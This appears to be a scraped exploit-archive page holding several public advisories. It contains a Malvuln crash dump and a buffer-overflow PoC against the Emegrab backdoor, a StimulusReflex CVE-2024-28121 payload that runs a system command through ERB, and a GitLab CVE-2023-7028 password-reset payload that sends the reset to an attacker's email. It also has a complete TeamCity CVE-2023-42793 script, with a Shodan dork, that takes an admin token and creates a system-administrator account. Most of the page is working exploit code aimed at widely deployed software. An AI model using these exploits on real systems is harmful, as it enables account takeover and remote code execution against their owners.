unknown!printable+0x0<br />260fffa0 41414141 unknown!printable+0x0<br />260fffa4 41414141 unknown!printable+0x0<br />260fffa8 41414141 unknown!printable+0x0<br />260fffac 41414141 unknown!printable+0x0<br />260fffb0 41414141 unknown!printable+0x0<br />260fffb4 41414141 unknown!printable+0x0<br />260fffb8 41414141 unknown!printable+0x0<br />260fffbc 41414141 unknown!printable+0x0<br />260fffc0 41414141 unknown!printable+0x0<br />260fffc4 41414141 unknown!printable+0x0<br />260fffc8 41414141 unknown!printable+0x0<br />260fffcc 41414141 unknown!printable+0x0<br />260fffd0 41414141 unknown!printable+0x0<br />260fffd4 41414141 unknown!printable+0x0<br />260fffd8 41414141 unknown!printable+0x0<br />260fffdc 41414141 unknown!printable+0x0<br />260fffe0 41414141 unknown!printable+0x0<br />260fffe4 41414141 unknown!printable+0x0<br />260fffe8 41414141 unknown!printable+0x0<br />260fffec 41414141 unknown!printable+0x0<br />260ffff0 41414141 unknown!printable+0x0<br />260ffff4 41414141 unknown!printable+0x0<br />260ffff8 41414141 unknown!printable+0x0<br />260ffffc 41414141 unknown!printable+0x0<br />26100000 41414141 unknown!printable+0x0<br /><br />STACK_COMMAND: .cxr 00000000260F5E38 ; kb ; dds 260f6298 ; kb<br /><br />SYMBOL_STACK_INDEX: 0<br /><br />SYMBOL_NAME: backdoor_win32_emegrab_b+fa2b<br /><br />FOLLOWUP_NAME: MachineOwner<br /><br />MODULE_NAME: Backdoor_Win32_Emegrab_b_19a14d0414aec62ef38378de2e8b259d<br /><br />IMAGE_NAME: Backdoor.Win32.Emegrab.b.19a14d0414aec62ef38378de2e8b259d.e<br /><br />DEBUG_FLR_IMAGE_TIMESTAMP: 4a822c0e<br /><br />FAILURE_BUCKET_ID: STACK_OVERFLOW_INVALID_EXPLOITABLE_FILL_PATTERN_41414141_c0000005_Backdoor.Win32.Emegrab.b.19a14d0414aec62ef38378de2e8b259d.e!Unknown<br /><br />BUCKET_ID: APPLICATION_FAULT_STACK_OVERFLOW_SOFTWARE_NX_FAULT_INVALID_EXPLOITABLE_FILL_PATTERN_41414141_BAD_IP_backdoor_win32_emegrab_b+fa2b<br />0:009> !exchain<br />260013fc: ntdll!ExecuteHandler2+44 (775e9d70)<br />260fffcc: 41414141<br />Invalid exception stack at 41414141<br /><br /><br />Exploit/PoC:<br />from socket import *<br /><br />MALWARE_HOST="x.x.x.x"<br />PORT=2323<br />s=socket(AF_INET, SOCK_STREAM)<br />s.connect((MALWARE_HOST, PORT))<br /><br />PAYLOAD="A"*666<br />s.send(PAYLOAD.encode())<br />s.close()<br /><br />print("Backdoor.Win32.Emegrab BOF Exploit by Malvuln")<br /><br /><br />Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).<br /></code></pre>
<pre><code>StimulusReflex CVE-2024-28121<br /><br />Arbitrary code execution in StimulusReflex. This affects version 3.5.0 up to and including 3.5.0.rc2 and v3.5.0.pre10.<br /><br />## Vulnerable code excerpt<br /><br />stimulus_reflex/lib/stimulus_reflex/reflex.rb<br />```<br /> # Invoke the reflex action specified by `name` and run all callbacks<br /> def process(name, *args)<br /> run_callbacks(:process) { public_send(name, *args) }<br /> end<br />```<br /><br />stimulus_reflex/app/channels/stimulus_reflex/channel.rb<br />```<br /> def delegate_call_to_reflex(reflex)<br /> method_name = reflex.method_name<br /> arguments = reflex.data.arguments<br /> method = reflex.method(method_name)<br /><br /> policy = StimulusReflex::ReflexMethodInvocationPolicy.new(method, arguments)<br /><br /> if policy.no_arguments?<br /> reflex.process(method_name)<br /> elsif policy.arguments?<br /> reflex.process(method_name, *arguments)<br /> else<br /> raise ArgumentError.new("wrong number of arguments (given #{arguments.inspect}, expected #{policy.required_params.inspect}, optional #{policy.optional_params.inspect})")<br /> end<br /> end<br />```<br /><br />stimulus_reflex/lib/stimulus_reflex/policies/reflex_invocation_policy.rb<br />```<br />module StimulusReflex<br /> class ReflexMethodInvocationPolicy<br /> attr_reader :arguments, :required_params, :optional_params<br /><br /> def initialize(method, arguments)<br /> @arguments = arguments<br /> @required_params = method.parameters.select { |(kind, _)| kind == :req }<br /> @optional_params = method.parameters.select { |(kind, _)| kind == :opt }<br /> end<br /><br /> def no_arguments?<br /> arguments.size == 0 && required_params.size == 0<br /> end<br /><br /> def arguments?<br /> arguments.size >= required_params.size && arguments.size <= required_params.size + optional_params.size<br /> end<br /><br /> def unknown?<br /> return false if no_arguments?<br /> return false if arguments?<br /><br /> true<br /> end<br /> end<br />end<br />```<br /><br />## Payload<br /><br />Find a websocket message with target and args.<br />```<br />\"target\":\"StimulusReflex::Reflex#render_collection\",\"args\":[{\"inline\": \"<% system('[command here]') %>\"}]<br />```<br /><br /></code></pre>
<pre><code># Exploit Title: GitLab CE/EE < 16.7.2 - Password Reset<br /># Exploit Author: Sebastian Kriesten (0xB455)<br /># Twitter: https://twitter.com/0xB455<br /><br /># Date: 2024-01-12<br /># Vendor Homepage: gitlab.com<br /># Vulnerability disclosure: https://about.gitlab.com/releases/2024/01/11/critical-security-release-gitlab-16-7-2-released/<br /># Version: <16.7.2, <16.6.4, <16.5.6<br /># CVE: CVE-2023-7028<br /><br />Proof of Concept:<br />user[email][]=valid@email.com&user[email][]=attacker@email.com<br /><br /><br /></code></pre>
<pre><code>#- Exploit Title: JetBrains TeamCity 2023.05.3 - Remote Code Execution (RCE)<br />#- Shodan Dork: http.title:TeamCity , http.favicon.hash:-1944119648<br />#- Exploit Author: ByteHunter<br />#- Vendor: JetBrains<br />#- Email: 0xByteHunter@proton.me<br />#- vendor: JetBrains<br />#- Version: versions before 2023.05.4<br />#- Tested on: 2023.05.3 <br />#- CVE : CVE-2023-42793 <br /><br />import requests<br />import argparse<br />import re<br />import random<br />import string<br />import subprocess <br /><br /><br />banner = """<br />=====================================================<br />* CVE-2023-42793 *<br />* TeamCity Admin Account Creation * <br />* *<br />* Author: ByteHunter *<br />=====================================================<br />"""<br /><br />print(banner)<br />parser = argparse.ArgumentParser(description="CVE-2023-42793 - TeamCity JetBrains PoC")<br />parser.add_argument("-u", "--url", required=True, help="Target URL")<br />parser.add_argument("-v", "--verbose", action="store_true", help="verbose mode")<br />args = parser.parse_args()<br /><br />url = args.url<br /><br />if url.startswith("https://"):<br /> curl_command = "curl -k"<br />else:<br /> curl_command = "curl"<br /><br />get_token_url = f"{url}/app/rest/users/id:1/tokens/RPC2"<br />delete_token_url = f"{url}/app/rest/users/id:1/tokens/RPC2"<br />create_user_url = f"{url}/app/rest/users"<br /><br />create_user_command = ""<br />token = ""<br /><br />response = requests.post(get_token_url, verify=False)<br />if response.status_code == 200:<br /> match = re.search(r'value="([^"]+)"', response.text)<br /> if match:<br /> token = match.group(1)<br /> print(f"Token: {token}") <br /> else:<br /> print("Token not found in the response")<br /><br />elif response.status_code == 404:<br /> print("Token already exists")<br /> delete_command = f'{curl_command} -X DELETE {delete_token_url}'<br /> delete_process = subprocess.Popen(delete_command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)<br /> delete_process.wait()<br /> delete_output = delete_process.communicate()<br /> if delete_process.returncode == 0:<br /> print("Previous token deleted successfully\nrun this command again for creating new token & admin user.")<br /> else:<br /> print("Failed to delete the previous token")<br />elif response.status_code == 400:<br /> print("Token already exists")<br /> delete_command = f'{curl_command} -X DELETE {delete_token_url}'<br /> delete_process = subprocess.Popen(delete_command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)<br /> delete_process.wait()<br /> delete_output = delete_process.communicate()<br /> if delete_process.returncode == 0:<br /> print("Previous token deleted successfully\nrun this command again for creating new token & admin user.")<br /> else:<br /> print("Failed to delete the previous token")<br />else:<br /> print("Failed to get a token")<br /><br />if token:<br /> headers = {<br /> "Authorization": f"Bearer {token}",<br /> "Content-Type": "application/json"<br /> }<br /> random_chars = ''.join(random.choice(string.ascii_letters + string.digits) for _ in range(4))<br /> username = f"city_admin{random_chars}"<br /> data = {<br /> "username": username,<br /> "password": "Main_password!!**",<br /> "email": "angry-admin@funnybunny.org",<br /> "roles": {"role": [{"roleId": "SYSTEM_ADMIN", "scope": "g"}]}<br /> }<br /> create_user_command = f'{curl_command} --path-as-is -H "Authorization: Bearer {token}" -X POST {create_user_url} -H "Content-Type: application/json" --data \'{{"username": "{username}", "password": "theSecretPass!", "email": "nest@nest", "roles": {{"role": [{{"roleId": "SYSTEM_ADMIN", "scope": "g"}}]}}}}\''<br /> create_user_response = requests.post(create_user_url, headers=headers, json=data)<br /> if create_user_response.status_code == 200:<br /> print("Successfully exploited!")<br /> print(f"URL: {url}")<br /> print(f"Username: {username}")<br /> print("Password: Main_password!!**")<br /> else:<br /> print("Failed to create new admin user")<br /><br />if args.verbose:<br /> if response.status_code == 400:<br /> pass<br /> else:<br /> print(f"Final curl command: {create_user_command}")<br /> <br /><br /></code></pre>